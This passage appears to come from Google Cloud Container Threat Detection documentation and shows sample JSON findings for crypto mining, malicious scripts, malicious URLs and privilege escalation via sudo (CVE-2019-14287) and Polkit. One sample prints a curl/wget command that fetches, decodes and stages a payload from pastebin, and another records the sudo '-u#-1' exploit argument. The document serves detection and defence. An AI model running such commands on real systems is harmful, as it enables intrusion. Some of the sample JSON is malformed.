"PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     "detectionCategory": {       "ruleName": "ktd_remove_bulk_data_from_disk"     },     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": "PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1729291973",             "nanos": 687426149           }         }       }     ],     "properties": {},     "findingId": "FINDING_ID",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/techniques/T1485/"       },       "virustotalIndicatorQueryUri": [         {           "displayName": "VirusTotal File Link",           "url": "https://www.virustotal.com/gui/file/430cdef8f363efe8b7fe0ce4af583b202b77d89f0ded08e3b77ac6aca0a0b304/detection"         }       ],       "relatedFindingUri": {}     }   }, }     

Impacto: atividade de mineração de criptomoedas suspeita através do protocolo Stratum

{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",     "category": "Impact: Suspicious crypto mining activity using the Stratum Protocol",     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_IMAGE_URI",         "imageId": "CONTAINER_IMAGE_ID",         "createTime": "2024-06-17T18:50:13Z"       }     ],     "createTime": "2025-01-21T19:55:22.017Z",     "database": {},     "eventTime": "2025-01-21T19:55:21.762Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "NAMESPACE",           "containers": [             {               "name": "CONTAINER_NAME",               "uri": "CONTAINER_IMAGE_URI",               "imageId": "CONTAINER_IMAGE_ID",               "createTime": "2025-01-21T19:55:19Z"             }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"         }       ]     },     "logEntries": [       {         "cloudLoggingEntry": {           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": "2025-01-21T19:55:19.654640277Z"         }       }     ],     "mitreAttack": {},     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "mitreAttack": {       "primaryTactic": "PRIVILEGE_ESCALATION",       "primaryTechniques": [         "ESCAPE_TO_HOST"       ]     },     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "muteUpdateTime": "1970-01-01T00:00:00Z",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "INTERPRETER",           "size": "147176",           "sha256": "INTERPRETER_SHA_256",           "hashedSize": "147176",           "partiallyHashed": false,           "diskPath": {}         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "args": [           "INTERPRETER",           "ARG"         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"KUBERNETES_SERVICE_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"HOSTNAME\"",             "val": "\"ktd-test-detect-crypto-miners-ba379a7c2168db11\""           },           {             "name": "\"HOME\"",             "val": "\"/root\""           },           {             "name": "\"GPG_KEY\"",             "val": "\"7169605F62C751356D054A26A821E680E5FA6305\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"PATH\"",             "val": "\"/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",             "val": "\"tcp\""           },           {             "name": "\"LANG\"",             "val": "\"C.UTF-8\""           },           {             "name": "\"PYTHON_VERSION\"",             "val": "\"3.12.6\""           },           {             "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"KUBERNETES_SERVICE_HOST\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"PWD\"",             "val": "\"/\""           }         ],         "pid": "9",         "parentPid": "1"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "HIGH",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "displayName": "CLUSTER_ID",     "type": "google.container.Cluster",     "cloudProvider": "GOOGLE_CLOUD_PLATFORM",     "service": "container.googleapis.com",     "location": "ZONE",     "gcpMetadata": {       "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "projectDisplayName": "PROJECT_ID",       "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "parentDisplayName": "PROJECT_ID",       "folders": [         {           "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",           "resourceFolderDisplayName": "FOLDER_ID"         }       ],       "organization": "organizations/ORGANIZATION_ID"     },     "resourcePath": {       "nodes": [         {           "nodeType": "GCP_PROJECT",           "id": "projects/PROJECT_ID",           "displayName": "PROJECT_ID"         },         {           "nodeType": "GCP_FOLDER",           "id": "folders/FOLDER_NUMBER",           "displayName": "FOLDER_ID"         },         {           "nodeType": "GCP_ORGANIZATION",           "id": "organizations/ORGANIZATION_ID"         }       ]     },     "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"   },   "sourceProperties": {     "sourceId": {       "projectNumber": "PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     "detectionCategory": {       "ruleName": "ktd_detect_crypto_miners_using_stratum_protocol"     },     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": "PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1729291973",             "nanos": 687426149           }         }       }     ],     "properties": {},     "findingId": "FINDING_ID",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/techniques/T1496/"       },       "virustotalIndicatorQueryUri": [         {           "displayName": "VirusTotal File Link",           "url": "https://www.virustotal.com/gui/file/f3bf59164816762430e8cdf5a5d64b4284a86af86245a52067c533c8cd98f215/detection"         }       ],       "relatedFindingUri": {}     }   }, }     

Script malicioso executado

{   "finding": {     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "state": "ACTIVE",     "category": "Malicious Script Executed",     "sourceProperties": {       "VM_Instance_Name": "INSTANCE_ID",       "Script_Filename": "FILENAME",       "Script_SHA256": "SHA_256",       "Container_Image_Id": "CONTAINER_IMAGE_ID",       "Container_Name": "CONTAINER_NAME",       "Parent_Pid": 1.0,       "Container_Image_Uri": "CONTAINER_IMAGE_URI",       "Process_Creation_Timestamp": {         "seconds": 1.617989997E9,         "nanos": 1.17396995E8       },       "Pid": 53.0,       "Pod_Namespace": "default",       "Process_Binary_Fullpath": "INTERPRETER",       "Process_Arguments": ["INTERPRETER", "FILENAME"],       "Pod_Name": "POD_NAME",       "description": "A machine learning model using Natural Language Processing techniques identified an executed bash script as malicious.",       "Script_Content": "(curl -fsSL https://pastebin.com||wget -q -O - https://pastebin.com)| tac | base64 -di | exit 0 | > x ; chmod 777 x ;",       "Environment_Variables": ["KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT",       "KUBERNETES_SERVICE_PORT\u003d443", "HOSTNAME\u003dreconnect-       test-4af235e12be6f9d9", "HOME\u003d/root",       "KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",       "PATH\u003d/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",       "KUBERNETES_PORT_443_TCP_PORT\u003d443",       "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp",       "DEBIAN_FRONTEND\u003dnoninteractive",       "KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT",       "KUBERNETES_SERVICE_PORT_HTTPS\u003d443",       "KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS", "PWD\u003d/"],       "Container_Creation_Timestamp": {         "seconds": 1.617989918E9,         "nanos": 0.0       }     },     "securityMarks": {       "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"     },     "eventTime": "2021-04-09T17:39:57.527Z",     "createTime": "2021-04-09T17:39:57.625Z",     "propertyDataTypes": {       "Container_Image_Id": {         "primitiveDataType": "STRING"       },       "Pod_Namespace": {         "primitiveDataType": "STRING"       },       "Container_Creation_Timestamp": {         "dataType": "TIMESTAMP",         "structValue": {           "fields": {             "seconds": {               "primitiveDataType": "NUMBER"             },             "nanos": {               "primitiveDataType": "NUMBER"             }           }         }       },       "Environment_Variables": {         "listValues": {           "propertyDataTypes": [{             "primitiveDataType": "STRING"           }]         }       },       "description": {         "primitiveDataType": "STRING"       },       "Pid": {         "primitiveDataType": "NUMBER"       },       "Process_Arguments": {         "listValues": {           "propertyDataTypes": [{             "primitiveDataType": "STRING"           }]         }       },       "Container_Image_Uri": {         "primitiveDataType": "STRING"       },       "Pod_Name": {         "primitiveDataType": "STRING"       },       "Process_Creation_Timestamp": {         "dataType": "TIMESTAMP",         "structValue": {           "fields": {             "seconds": {               "primitiveDataType": "NUMBER"             },             "nanos": {               "primitiveDataType": "NUMBER"             }           }         }       },       "Parent_Pid": {         "primitiveDataType": "NUMBER"       },       "VM_Instance_Name": {         "primitiveDataType": "STRING"       },       "Script_Content": {         "primitiveDataType": "STRING"       },       "Script_Filename": {         "primitiveDataType": "STRING"       },       "Container_Name": {         "primitiveDataType": "STRING"       },       "Script_SHA256": {         "primitiveDataType": "STRING"       },       "Process_Binary_Fullpath": {         "primitiveDataType": "STRING"       }     },     "severity": "CRITICAL",     "workflowState": "NEW",     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",     "projectDisplayName": "PROJECT_ID",     "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",     "parentDisplayName": "PROJECT_ID",     "type": "google.container.Cluster"   } }   

URL malicioso observado

    {       "findings": {         "access": {},         "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",         "category": "Malicious URL Observed",         "containers": [           {             "name": "CONTAINER_NAME",             "uri": "CONTAINER_URI",             "imageId": "CONTAINER_IMAGE_ID"           }         ],         "createTime": "2022-09-14T21:35:46.209Z",         "database": {},         "description": "A malicious URL is observed in the container workload.",         "eventTime": "2022-09-14T21:35:45.992Z",         "exfiltration": {},         "findingClass": "THREAT",         "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",         "indicator": {           "uris": [             "testsafebrowsing.appspot.com/s/malware.html"           ]         },         "kubernetes": {           "pods": [             {               "ns": "default",               "name": "CONTAINER_NAME",               "containers": [                 {                   "name": "CONTAINER_NAME",                   "uri": "CONTAINER_URI",                   "imageId": CONTAINER_IMAGE_ID"                 }               ]             }           ]         },         "mitreAttack": {           "primaryTactic": "COMMAND_AND_CONTROL",           "primaryTechniques": [             "INGRESS_TOOL_TRANSFER"           ]         },         "mute": "UNDEFINED",         "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",         "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",         "parentDisplayName": "Container Threat Detection",         "processes": [           {             "binary": {               "path": "\"/bin/echo\""             },             "script": {},             "args": [               "\"/bin/echo\"",               "\"https://testsafebrowsing.appspot.com/s/malware.html\""             ],             "envVariables": [               {                 "name": "\"PATH\"",                 "val": "\"/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""               },               {                 "name": "\"HOSTNAME\"",                 "val": "\"CONTAINER_NAME\""               },               {                 "name": "\"DEBIAN_FRONTEND\"",                 "val": "\"noninteractive\""               },               {                 "name": "\"LANG\"",                 "val": "\"C.UTF-8\""               },               {                 "name": "\"PYTHONUNBUFFERED\"",                 "val": "\"1\""               },               {                 "name": "\"PORT\"",                 "val": "\"8080\""               },               {                 "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",                 "val": "\"IP_ADDRESS\""               },               {                 "name": "\"KUBERNETES_SERVICE_HOST\"",                 "val": "\"IP_ADDRESS\""               },               {                 "name": "\"KUBERNETES_SERVICE_PORT\"",                 "val": "\"443\""               },               {                 "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",                 "val": "\"443\""               },               {                 "name": "\"KUBERNETES_PORT\"",                 "val": "\"tcp://IP_ADDRESS:443\""               },               {                 "name": "\"KUBERNETES_PORT_443_TCP\"",                 "val": "\"tcp://IP_ADDRESS:443\""               },               {                 "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",                 "val": "\"tcp\""               },               {                 "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",                 "val": "\"443\""               },               {                 "name": "\"HOME\"",                 "val": "\"/root\""               }             ],             "pid": "1"           }         ],         "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",         "severity": "MEDIUM",         "sourceDisplayName": "Container Threat Detection",         "state": "ACTIVE",         "vulnerability": {},         "workflowState": "NEW"       },       "resource": {         "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",         "display_name": "CLUSTER_ID",         "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",         "project_display_name": "PROJECT_ID",         "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",         "parent_display_name": "PROJECT_ID",         "type": "google.container.Cluster",         "folders": []       },       "sourceProperties": {         "Container_Image_Id": "CONTAINER_IMAGE_ID",         "Pod_Namespace": "default",         "Container_Name": "CONTAINER_NAME",         "Process_Binary_Fullpath": "/bin/echo",         "description": "A malicious URL is observed in the container workload.",         "VM_Instance_Name": "VM_INSTANCE_NAME",         "Pid": 1,         "Process_Arguments": [           "/bin/echo",           "https://testsafebrowsing.appspot.com/s/malware.html"         ],         "Container_Image_Uri": "CONTAINER_IMAGE_URI",         "Parent_Pid": 0,         "Process_Creation_Timestamp": {           "seconds": 1663191345,           "nanos": 7717272         },         "Environment_Variables": [           "PATH=/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",           "HOSTNAME=CONTAINER_NAME",           "DEBIAN_FRONTEND=noninteractive",           "LANG=C.UTF-8",           "PYTHONUNBUFFERED=1",           "PORT=8080",           "KUBERNETES_PORT_443_TCP_ADDR=IP_ADDRESS",           "KUBERNETES_SERVICE_HOST=IP_ADDRESS",           "KUBERNETES_SERVICE_PORT=443",           "KUBERNETES_SERVICE_PORT_HTTPS=443",           "KUBERNETES_PORT=tcp://IP_ADDRESS:443",           "KUBERNETES_PORT_443_TCP=tcp://IP_ADDRESS:443",           "KUBERNETES_PORT_443_TCP_PROTO=tcp",           "KUBERNETES_PORT_443_TCP_PORT=443",           "HOME=/root"         ],         "Container_Creation_Timestamp": {           "seconds": 1663191345,           "nanos": 0         },         "Pod_Name": "CONTAINER_NAME"       }     }   

Escalamento de privilégios: abuso de sudo para escalamento de privilégios (CVE-2019-14287)

{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",     "category": "Privilege Escalation: Abuse of Sudo For Privilege Escalation (CVE-2019-14287)",     "chokepoint": {},     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_IMAGE_URI",         "imageId": "CONTAINER_IMAGE_ID",         "createTime": "2025-07-22T00:07:48Z"       }     ],     "createTime": "2025-07-22T00:07:54.853Z",     "database": {},     "dataProtectionKeyGovernance": {},     "eventTime": "2025-07-22T00:07:54.627Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "NAMESPACE",           "containers": [             {               "name": "CONTAINER_NAME",               "uri": "CONTAINER_IMAGE_URI",               "imageId": "CONTAINER_IMAGE_ID",               "createTime": "2025-01-21T19:55:19Z"             }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"         }       ]     },     "logEntries": [       {         "cloudLoggingEntry": {           "resourceContainer": "projects/770715367326",           "timestamp": "2025-07-22T00:07:48.052030557Z"         }       }     ],     "mitreAttack": {       "primaryTactic": "PRIVILEGE_ESCALATION",       "primaryTechniques": [         "EXPLOITATION_FOR_PRIVILEGE_ESCALATION"       ],       "additionalTactics": [         "DEFENSE_EVASION",         "PRIVILEGE_ESCALATION"       ],       "additionalTechniques": [         "ABUSE_ELEVATION_CONTROL_MECHANISM"       ]     },     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "muteUpdateTime": "1970-01-01T00:00:00Z",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",     "parentDisplayName": "Container Threat Detection",    "processes": [       {         "binary": {           "path": "\"/tmp/sudo\"",           "size": "142312",           "sha256": "1bea8094b78a3910345d80af3d182390fda07ae5788352651eb7773505dc39af",           "hashedSize": "142312",           "partiallyHashed": false,           "diskPath": {}         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "args": [           "\"/tmp/sudo\"",           "\"-u#-1\""         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_SERVICE_PORT\"",             "val": "\"443\""           },           {             "name": "\"HOSTNAME\"",             "val": "\"ktd-test-abuse-sudo-2025-07-21-17-20-36-utc\""           },           {             "name": "\"PWD\"",             "val": "\"/\""           },           {             "name": "\"HOME\"",             "val": "\"/root\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"TERM\"",             "val": "\"xterm\""           },           {             "name": "\"SHLVL\"",             "val": "\"1\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",             "val": "\"tcp\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"KUBERNETES_SERVICE_HOST\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"KUBERNETES_PORT\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",             "val": "\"443\""           },           {             "name": "\"PATH\"",             "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""           },           {             "name": "\"_\"",             "val": "\"/tmp/sudo\""           }         ],         "pid": "10",         "parentPid": "1",         "userId": "0"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "CRITICAL",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "displayName": "CLUSTER_ID",     "type": "google.container.Cluster",     "cloudProvider": "GOOGLE_CLOUD_PLATFORM",     "service": "container.googleapis.com",     "location": "ZONE",     "gcpMetadata": {       "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "projectDisplayName": "PROJECT_ID",       "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "parentDisplayName": "PROJECT_ID",       "folders": [         {           "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",           "resourceFolderDisplayName": "FOLDER_ID"         }       ],       "organization": "organizations/ORGANIZATION_ID"     },     "resourcePath": {       "nodes": [         {           "nodeType": "GCP_PROJECT",           "id": "projects/PROJECT_ID",           "displayName": "PROJECT_ID"         },         {           "nodeType": "GCP_FOLDER",           "id": "folders/FOLDER_NUMBER",           "displayName": "FOLDER_ID"         },         {           "nodeType": "GCP_ORGANIZATION",           "id": "organizations/ORGANIZATION_ID"         }       ]     },     "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"   },   "sourceProperties": {     "sourceId": {       "projectNumber": "PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     "detectionCategory": {       "ruleName": "ktd_abuse_sudo_for_privilege_escalation"     },     "detectionPriority": "CRITICAL",     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": "PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1729291973",             "nanos": 687426149           }         }       }     ],     "properties": {},     "findingId": "FINDING_ID",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/tactics/TA0004/"       },       "virustotalIndicatorQueryUri": [         {           "displayName": "VirusTotal File Link",           "url": "https://www.virustotal.com/gui/file/1bea8094b78a3910345d80af3d182390fda07ae5788352651eb7773505dc39af/detection"         }       ],       "relatedFindingUri": {}     }   } }     

Escalamento de privilégios: execução sem ficheiros em /dev/shm

{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",     "category": "Privilege Escalation: Fileless Execution in /dev/shm",     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_IMAGE_URI",         "imageId": "CONTAINER_IMAGE_ID",         "createTime": "2024-06-17T18:50:13Z"       }     ],     "createTime": "2025-01-21T19:55:22.017Z",     "database": {},     "eventTime": "2025-01-21T19:55:21.762Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "NAMESPACE",           "containers": [             {               "name": "CONTAINER_NAME",               "uri": "CONTAINER_IMAGE_URI",               "imageId": "CONTAINER_IMAGE_ID",               "createTime": "2025-01-21T19:55:19Z"             }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"         }       ]     },     "logEntries": [       {         "cloudLoggingEntry": {           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": "2025-01-21T19:55:19.654640277Z"         }       }     ],     "mitreAttack": {},     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "mitreAttack": {       "primaryTactic": "PRIVILEGE_ESCALATION",       "primaryTechniques": [         "PROCESS_INJECTION"       ]       "additionalTactics": [         "DEFENSE_EVASION"       ],       "additionalTechniques": [         "COMMAND_AND_SCRIPTING_INTERPRETER",         "UNIX_SHELL",         "HIDE_ARTIFACTS"       ]     },     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "muteUpdateTime": "1970-01-01T00:00:00Z",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "\"/dev/shm/echo\"",           "size": "39096",           "sha256": "a51595201def5bde3c47d68c8e8dda31f4e424293f2a5eefb00e47f2db0c2d84",           "hashedSize": "39096",           "partiallyHashed": false,           "diskPath": {}         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "args": [           "\"eho\"",           "\"Hello World\""         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"HOSTNAME\"",             "val": "\"CONTAINER_NAME\""           },         ],         "pid": "9",         "parentPid": "1"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "HIGH",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "displayName": "CLUSTER_ID",     "type": "google.container.Cluster",     "cloudProvider": "GOOGLE_CLOUD_PLATFORM",     "service": "container.googleapis.com",     "location": "ZONE",     "gcpMetadata": {       "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "projectDisplayName": "PROJECT_ID",       "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "parentDisplayName": "PROJECT_ID",       "folders": [         {           "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",           "resourceFolderDisplayName": "FOLDER_ID"         }       ],       "organization": "organizations/ORGANIZATION_ID"     },     "resourcePath": {       "nodes": [         {           "nodeType": "GCP_PROJECT",           "id": "projects/PROJECT_ID",           "displayName": "PROJECT_ID"         },         {           "nodeType": "GCP_FOLDER",           "id": "folders/FOLDER_NUMBER",           "displayName": "FOLDER_ID"         },         {           "nodeType": "GCP_ORGANIZATION",           "id": "organizations/ORGANIZATION_ID"         }       ]     },     "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"   },   "sourceProperties": {     "sourceId": {       "projectNumber": "PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     "detectionCategory": {       "ruleName": "ktd_fileless_execution_detection"     },     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": "PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1729291973",             "nanos": 687426149           }         }       }     ],     "properties": {},     "findingId": "FINDING_ID",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/tactics/TA0004/"       },       "virustotalIndicatorQueryUri": [         {           "displayName": "VirusTotal File Link",           "url": "https://www.virustotal.com/gui/file/a51595201def5bde3c47d68c8e8dda31f4e424293f2a5eefb00e47f2db0c2d84/detection"         }       ],       "relatedFindingUri": {}     }   }, }     

Escalamento de privilégios: vulnerabilidade de escalamento de privilégios locais do Polkit (CVE-2021-4034)

{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",     "category": "Privilege Escalation: Polkit Local Privilege Escalation Vulnerability (CVE-2021-4034)",     "chokepoint": {},     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_IMAGE_URI",         "imageId": "CONTAINER_IMAGE_ID",         "createTime": "2025-07-22T00:07:48Z"       }     ],     "createTime": "2025-07-22T00:07:54.853Z",     "database": {},     "dataProtectionKeyGovernance": {},     "eventTime": "2025-07-22T00:07:54.627Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "NAMESPACE",           "containers": [             {               "name": "CONTAINER_NAME",               "uri": "CONTAINER_IMAGE_URI",               "imageId": "CONTAINER_IMAGE_ID",               "createTime": "2025-01-21T19:55:19Z"             }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"         }       ]     },     "logEntries": [       {         "cloudLoggingEntry": {           "resourceContainer": "projects/770715367326",           "timestamp": "2025-07-22T00:07:48.052030557Z"         }       }     ],     "mitreAttack": {       "primaryTactic": "PRIVILEGE_ESCALATION",       "primaryTechniques": [         "EXPLOITATION_FOR_PRIVILEGE_ESCALATION"       ],       "additionalTactics": [         "RESOURCE_DEVELOPMENT"       ],       "additionalTechniques": [         